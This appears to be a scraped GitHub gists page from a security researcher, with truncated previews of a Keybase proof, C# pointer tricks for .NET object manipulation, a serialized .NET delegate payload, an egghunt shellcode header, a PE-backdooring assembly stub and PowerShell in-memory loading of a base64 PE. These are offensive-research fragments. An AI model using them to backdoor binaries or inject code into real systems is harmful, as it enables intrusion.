I hereby claim:
- I am tophertimzen on github.
- I am ttimzen (https://keybase.io/ttimzen) on keybase.
- I have a public key ASDujVwoiebsWPA5e5Xk4wd9blw29002bROa67GXKNbZ5Qo
To claim this, I am signing this object:
Type reference = typeof(GrayFrost.testClass); | |
ConstructorInfo ctor = reference.GetConstructor (Type.EmptyTypes); | |
object wantedObject = ctor.Invoke(new object[]{}); |
public static IntPtr getObjectAddr(object wantedObject) | |
{ | |
IntPtr objectPointer = (IntPtr)5; | |
Unsafe | |
{ | |
return objectPointer = *(&objectPointer - 3); | |
} | |
} |
public static object GetInstance(IntPtr ptrIN) | |
{ | |
object refer = ptrIN.GetType(); | |
IntPtr pointer = ptrIN; | |
unsafe | |
{ | |
*(&pointer - 1) = *(&pointer); | |
} | |
return refer; | |
} |
I hereby claim:
To claim this, I am signing this object:
var serialized_obj = [ | |
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108, | |
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108, | |
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46, | |
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101, | |
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105, | |
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77, | |
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0, | |
0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101, |
/* | |
* Optimized egghunt shellcode for win32 (32 bytes) | |
* | |
* Credits: http://www.hick.org/~mmiller/shellcode/win32/egghunt_syscall.c | |
* | |
* Description | |
* | |
* This code works by abusing an NT syscall (NtAccessCheckAndAuditAlaram) | |
* whereby it uses the kernel to validate whether or not a set of addresses | |
* is valid, and, if it is, whether or not they match the 8 byte egg we're |
''' | |
HeapWalker - Walking Windows 7 process heaps using pydbg | |
Author : Debasish Mandal | |
Blog :http://www.debasish.in/ | |
Twitter : https://twitter.com/debasishm89 | |
Description : This python script is simplest implementation of Windows HeapWalk() API. | |
It uses pydbg and allows user to Walk Through debugee process's heaps on the fly. |
; Topher Timzen | |
; Messing around with PE backdooring for CTP/OSCE and wanted to make a new thread inside of process to avoid synchronization issues. | |
; Tons of NULL as I used this in a PE directly, no need to avoid them. | |
; nasm CreateThread.asm -o CreateThread.raw; xxd -p CreateThread.raw | tr -d '\n' | |
[BITS 32] | |
[SECTION .text] | |
global _start |
$Domain = [AppDomain]::CurrentDomain | |
$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly') | |
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule') | |
# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into. | |
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll') | |
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public) | |
$TypeBuilder.CreateType() | |
$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA |